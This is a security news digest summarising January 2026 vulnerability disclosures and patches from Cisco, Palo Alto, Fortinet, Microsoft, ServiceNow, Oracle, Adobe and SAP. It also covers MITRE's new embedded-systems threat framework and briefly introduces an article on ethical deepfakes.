Cisco Fixes Actively Exploited Zero-Day CVE-2026-20045 in Unified CM and Webex
Cisco has released fresh patches to address what it described as a “critical” security vulnerability impacting multiple Unified Communications (CM) products and Webex Calling Dedicated Instance that it has been actively exploited as a zero-day in the wild.
The vulnerability, CVE-2026-20045 (CVSS score: 8.2), could permit an unauthenticated remote attacker to execute arbitrary commands on the underlying operating system of a susceptible device.
“This vulnerability is due to improper validation of user-supplied input in HTTP requests,” Cisco said in an advisory. “An attacker could exploit this vulnerability by sending a sequence of crafted HTTP requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root.”
The critical rating for the flaw is due to the fact that its exploitation could allow for privilege escalation to root, it added.
Source: The hacker news / Bleeping computer / Helpnet security / CISCO security advisory
Link: https://thehackernews.com/2026/01/cisco-fixes-actively-exploited-zero-day.html
Link: https://www.helpnetsecurity.com/2026/01/21/cisco-enterprise-communications-cve-2026-20045/
Cisco Patches Zero-Day RCE Exploited by China-Linked APT in Secure Email Gateways
Cisco on Thursday released security updates for a maximum-severity security flaw impacting Cisco AsyncOS Software for Cisco Secure Email Gateway and Cisco Secure Email and Web Manager, nearly a month after the company disclosed that it had been exploited as a zero-day by a China-nexus advanced persistent threat (APT) actor codenamed UAT-9686.
The vulnerability, tracked as CVE-2025-20393 (CVSS score: 10.0), is a remote command execution flaw arising as a result of insufficient validation of HTTP requests by the Spam Quarantine feature. Successful exploitation of the defect could permit an attacker to execute arbitrary commands with root privileges on the underlying operating system of an affected appliance.
However, for the attack to work, three conditions must be met –
- The appliance is running a vulnerable release of Cisco AsyncOS Software
- The appliance is configured with the Spam Quarantine feature
- The Spam Quarantine feature is exposed to and reachable from the internet
Last month, the networking equipment major revealed that it found evidence of UAT-9686 exploiting the vulnerability as early as late November 2025 to drop tunneling tools like ReverseSSH (aka AquaTunnel) and Chisel, and a log cleaning utility called AquaPurge. The attacks are also characterized by the deployment of a lightweight Python backdoor dubbed AquaShell that’s capable of receiving encoded commands and executing them.
Source: The hacker news / Bleeping computer / Securityweek
Link: https://thehackernews.com/2026/01/cisco-patches-zero-day-rce-exploited-by.html
Link: https://www.securityweek.com/cisco-patches-vulnerability-exploited-by-chinese-hackers/
Palo Alto Fixes GlobalProtect DoS Flaw That Can Crash Firewalls Without Login
Palo Alto Networks has released security updates for a high-severity security flaw impacting GlobalProtect Gateway and Portal, for which it said there exists a proof-of-concept (PoC) exploit.
The vulnerability, tracked as CVE-2026-0227 (CVSS score: 7.7), has been described as a denial-of-service (DoS) condition impacting GlobalProtect PAN-OS software arising as a result of an improper check for exceptional conditions (CWE-754)
“A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to cause a denial-of-service (DoS) to the firewall,” the company said in an advisory released Wednesday. “Repeated attempts to trigger this issue result in the firewall entering into maintenance mode.”
The issue, discovered and reported by an unnamed external researcher, affects the following versions –
- PAN-OS 12.1 < 12.1.3-h3, < 12.1.4
- PAN-OS 11.2 < 11.2.4-h15, < 11.2.7-h8, < 11.2.10-h2
- PAN-OS 11.1 < 11.1.4-h27, < 11.1.6-h23, < 11.1.10-h9, < 11.1.13
- PAN-OS 10.2 < 10.2.7-h32, < 10.2.10-h30, < 10.2.13-h18, < 10.2.16-h6, < 10.2.18-h1
- PAN-OS 10.1 < 10.1.14-h20
- Prisma Access 11.2 < 11.2.7-h8
- Prisma Access 10.2 < 10.2.10-h29
Palo Alto Networks also clarified that the vulnerability is applicable only to PAN-OS NGFW or Prisma Access configurations with an enabled GlobalProtect gateway or portal. The company’s Cloud Next-Generation Firewall (NGFW) is not impacted. There are no workarounds to mitigate the flaw.
Source: The hacker news / Bleeping computer
Link: https://thehackernews.com/2026/01/palo-alto-fixes-globalprotect-dos-flaw.html
Exploit code public for critical FortiSIEM command injection flaw
Technical details and a public exploit have been published for a critical vulnerability affecting Fortinet’s Security Information and Event Management (SIEM) solution that could be leveraged by a remote, unauthenticated attacker to execute commands or code.
The vulnerability is tracked as CVE-2025-64155, and is a combination of two issues that permit arbitrary write with admin permissions and privilege escalation to root access.
Researchers at penetration testing company Horizon3.ai reported the security issue in mid-August 2025, but it was only fixed on January 13, 2026.
Fortinet describes the CVE-2025-64155 vulnerability as “an improper neutralization of special elements used in an OS command vulnerability in FortiSIEM may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests.”
Horizon3.ai has published a detailed write-up explaining that the root cause of the issue is the exposure of dozens of command handlers on the phMonitor service, which can be invoked remotely without authentication.
Source: Bleeping computer / Securityweek
Link: https://www.securityweek.com/fortinet-patches-critical-vulnerabilities-in-fortifone-fortisiem/
Fortinet Fixes Critical FortiSIEM Flaw Allowing Unauthenticated Remote Code Execution
Fortinet has released updates to fix a critical security flaw impacting FortiSIEM that could allow an unauthenticated attacker to achieve code execution on susceptible instances.
The operating system (OS) injection vulnerability, tracked as CVE-2025-64155, is rated 9.4 out of 10.0 on the CVSS scoring system.
“An improper neutralization of special elements used in an OS command (‘OS command injection’) vulnerability [CWE-78] in FortiSIEM may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests,” the company said in a Tuesday bulletin.
Fortinet said the vulnerability affects only Super and Worker nodes, and that it has been addressed in the following versions –
- FortiSIEM 6.7.0 through 6.7.10 (Migrate to a fixed release)
- FortiSIEM 7.0.0 through 7.0.4 (Migrate to a fixed release)
- FortiSIEM 7.1.0 through 7.1.8 (Upgrade to 7.1.9 or above)
- FortiSIEM 7.2.0 through 7.2.6 (Upgrade to 7.2.7 or above)
- FortiSIEM 7.3.0 through 7.3.4 (Upgrade to 7.3.5 or above)
- FortiSIEM 7.4.0 (Upgrade to 7.4.1 or above)
- FortiSIEM 7.5 (Not affected)
- FortiSIEM Cloud (Not affected)
Horizon3.ai security researcher Zach Hanley, who is credited with discovering and reporting the flaw on August 14, 2025, said it comprises two moving parts –
An unauthenticated argument injection vulnerability that leads to arbitrary file write, allowing for remote code execution as the admin user
A file overwrite privilege escalation vulnerability that leads to root access and complete compromise of the appliance
Specifically, the problem has to do with how FortiSIEM’s phMonitor service – a crucial backend process responsible for health monitoring, task distribution, and inter-node communication via TCP port 7900 – handles incoming requests related to logging security events to Elasticsearch.
Source: The hacker news / Dark reading
Link: https://thehackernews.com/2026/01/fortinet-fixes-critical-fortisiem-flaw.html
Link: https://www.darkreading.com/vulnerabilities-threats/fortinet-critical-fortisiem-flaw-exploited
Microsoft Fixes 114 Windows Flaws in January 2026 Patch, One Actively Exploited
Microsoft on Tuesday rolled out its first security update for 2026, addressing 114 security flaws, including one vulnerability that it said has been actively exploited in the wild.
Of the 114 flaws, eight are rated Critical, and 106 are rated Important in severity. As many as 58 vulnerabilities have been classified as privilege escalation, followed by 22 information disclosure, 21 remote code execution, and five spoofing flaws. According to data collected by Fortra, the update marks the third-largest January Patch Tuesday after January 2025 and January 2022.
These patches are in addition to two security flaws that Microsoft has addressed in its Edge browser since the release of the December 2025 Patch Tuesday update, including a spoofing flaw in its Android app (CVE-2025-65046, 3.1) and a case of insufficient policy enforcement in Chromium’s WebView tag (CVE-2026-0628, CVSS score: 8.8).
The vulnerability that has come under in-the-wild exploitation is CVE-2026-20805 (CVSS score: 5.5), an information disclosure flaw impacting Desktop Window Manager. The Microsoft Threat Intelligence Center (MTIC) and Microsoft Security Response Center (MSRC) have been credited with identifying and reporting the flaw.
“Exposure of sensitive information to an unauthorized actor in Desktop Windows Manager (DWM) allows an authorized attacker to disclose information locally,” Microsoft said in an advisory. “The type of information that could be disclosed if an attacker successfully exploited this vulnerability is a section address from a remote ALPC port, which is user-mode memory.”
There are currently no details on how the vulnerability is being exploited, the scale of such efforts, and who may be behind the activity.
Source: The hacker news / Bleeping computer / Krebs on security / Dark reading / Securityweek / CISCO Talos intelligence group / SANS internet storm center
Link: https://thehackernews.com/2026/01/microsoft-fixes-114-windows-flaws-in.html
Link: https://krebsonsecurity.com/2026/01/patch-tuesday-january-2026-edition/
Link: https://www.darkreading.com/application-security/microsofts-starts-2026-bang-zero-day
Link: https://www.securityweek.com/microsoft-patches-exploited-windows-zero-day-111-other-vulnerabilities/
Link: https://blog.talosintelligence.com/microsoft-patch-tuesday-january-2026/
Link: https://isc.sans.edu/diary/January%202026%20Microsoft%20Patch%20Tuesday%20Summary/32624
ServiceNow Patches Critical AI Platform Flaw Allowing Unauthenticated User Impersonation
ServiceNow has disclosed details of a now-patched critical security flaw impacting its ServiceNow artificial intelligence (AI) Platform that could enable an unauthenticated user to impersonate another user and perform arbitrary actions as that user.
The vulnerability, tracked as CVE-2025-12420, carries a CVSS score of 9.3 out of 10.0. It has been codenamed BodySnatcher by AppOmni.
“This issue […] could enable an unauthenticated user to impersonate another user and perform the operations that the impersonated user is entitled to perform,” the company said in an advisory released Monday.
The shortcoming was addressed by ServiceNow on October 30, 2025, by deploying a security update to the majority of hosted instances, with the company also sharing the patches with ServiceNow partners and self-hosted customers.
The following versions include a fix for CVE-2025-12420 –
- Now Assist AI Agents (sn_aia) – 5.1.18 or later and 5.2.19 or later
- Virtual Agent API (sn_va_as_service) – 3.15.2 or later and 4.0.4 or later
ServiceNow credited Aaron Costello, chief of SaaS Security Research at AppOmni, with discovering and reporting the flaw in October 2025. While there is no evidence that the vulnerability has been exploited in the wild, users are advised to apply an appropriate security update as soon as possible to mitigate potential threats.
Source: The hacker news / Dark reading
Link: https://thehackernews.com/2026/01/servicenow-patches-critical-ai-platform.html
Link: https://www.darkreading.com/remote-workforce/ai-vulnerability-servicenow
MITRE Launches New Security Framework for Embedded Systems
MITRE on Tuesday announced the launch of Embedded Systems Threat Matrix (ESTM), a cybersecurity framework designed to help organizations protect critical embedded systems.
Inspired by the popular ATT&CK framework and derived from MITRE’s theoretical research and proof-of-concept models, the ESTM categorizes specific attack tactics and techniques tailored to hardware and firmware environments.
The model maps both established and emerging attack vectors to assist organizations in identifying vulnerabilities within embedded architectures.
MITRE says the framework can be used in industries such as energy, robotics, industrial controls, transportation, and healthcare.
“The ESTM has proven valuable in various applications, including cyber threat modeling and attack path analysis, and its alignment with established cybersecurity frameworks ensures seamless integration with existing security practices,” MITRE says on its website.
The non-profit R&D organization also points out that ESTM works with the EMB3D Threat Model.
Source: Securityweek
Link: https://www.securityweek.com/mitre-launches-new-security-framework-for-embedded-systems/
Oracle’s First 2026 CPU Delivers 337 New Security Patches
Oracle has released 337 new security patches for over 30 products as part of its first Critical Patch Update (CPU) for 2026.
There appear to be roughly 230 unique CVEs in Oracle’s January 2026 CPU advisory.
More than two dozen of the fresh fixes resolve critical-severity vulnerabilities and over 235 patches address flaws that are remotely exploitable without authentication.
Roughly half a dozen patches address CVE-2025-66516 (CVSS score of 10/10), a critical defect in Apache Tika that could lead to XML External Entity (XXE) injection attacks.
Impacting three modules of Apache Tika, the vulnerability can be exploited by placing crafted XFA files inside PDF documents.
Oracle products that received patches for the issue include Commerce, Communications, Construction and Engineering, Fusion Middleware, and PeopleSoft.
Once again, Oracle Communications received the largest number of security fixes, at 56. Of these 34 resolve bugs that can be exploited by remote, unauthenticated attackers.
Source: Securityweek / Oracle security advisory
Link: https://www.securityweek.com/oracles-first-2026-cpu-delivers-337-new-security-patches/
Link: https://www.oracle.com/security-alerts/cpujan2026.html#AppendixFMW
Adobe Patches Critical Apache Tika Bug in ColdFusion
Adobe has released security updates for 11 products on January 2026 Patch Tuesday, addressing a total of 25 vulnerabilities, including a critical code execution flaw.
The critical-severity issue, tracked as CVE-2025-66516 (CVSS score of 10/10), is an XML External Entity (XXE) injection bug in Apache Tika modules that could be exploited via XFA files placed inside PDF documents.
The security defect was patched in early December, when Apache warned that successful exploitation could lead to information leaks, SSRF attacks, denial-of-service (DoS), or remote code execution (RCE).
On Tuesday, Adobe released a ColdFusion security update to resolve CVE-2025-66516, noting that all ColdFusion 2025 Update 5 and earlier versions, and ColdFusion 2023 Update 17 and earlier versions are affected, on all platforms.
The vulnerability was addressed in ColdFusion 2025 Update 6 and ColdFusion 2023 Update 18. Adobe has slapped a priority rating of ‘1’ on the security bulletin, urging users to update as soon as possible.
Another Adobe product that received an update on January 2026 Patch Tuesday is Dreamweaver. The security refresh resolves five high-severity flaws, four leading to arbitrary code execution and one leading to arbitrary system file write.
Source: Securityweek
Link: https://www.securityweek.com/adobe-patches-critical-apache-tika-bug-in-coldfusion/
SAP’s January 2026 Security Updates Patch Critical Vulnerabilities
Enterprise software maker SAP on Tuesday announced the release of 17 new security notes as part of its January 2026 Security Patch Day. Four of the notes address critical-severity vulnerabilities.
The first note in SAP’s January 2026 advisory resolves CVE-2026-0501 (CVSS score of 9.9), a critical SQL injection bug in S/4HANA.
The issue impacts a Remote Function Call-enabled module relying on the ABAP Database Connectivity (ADBC) framework for the execution of a native SQL statement, explains Onapsis, which discovered and reported the bug.
“This SQL statement is provided through an input parameter and allows an attacker to execute arbitrary SQL commands. On successful exploitation, the system can be fully compromised,” the security firm notes.
The second critical bug that SAP addressed on Tuesday is CVE-2026-0500 (CVSS score of 9.6), a remote code execution (RCE) issue in Wily Introscope Enterprise Manager.
According to Onapsis, the application allows unauthenticated attackers to craft malicious JNLP (Java Network Launch Protocol) files that can be accessed via URLs.
Source: Securityweek
Link: https://www.securityweek.com/saps-january-2026-security-updates-patch-critical-vulnerabilities/
SCANT: A (kind-of-decent) Framework for Ethical Deepfake Creation & Distribution
Lots of damage has been done with AI, and to keep from deep-sixing the forward-leaning tone I want in this article, I’ll refrain from noting any details – the internet is available for you to search to your heart’s content. I want to start with that note because how we use AI is not just an option, like whether we want a cinnamon roll or a bagel at breakfast. AI use has meaning – whether it’s dark or not depends on each of us.
Source: Secjuice
Link: https://www.secjuice.com/scant-framework-for-ethical-deepfake-creation-distribution/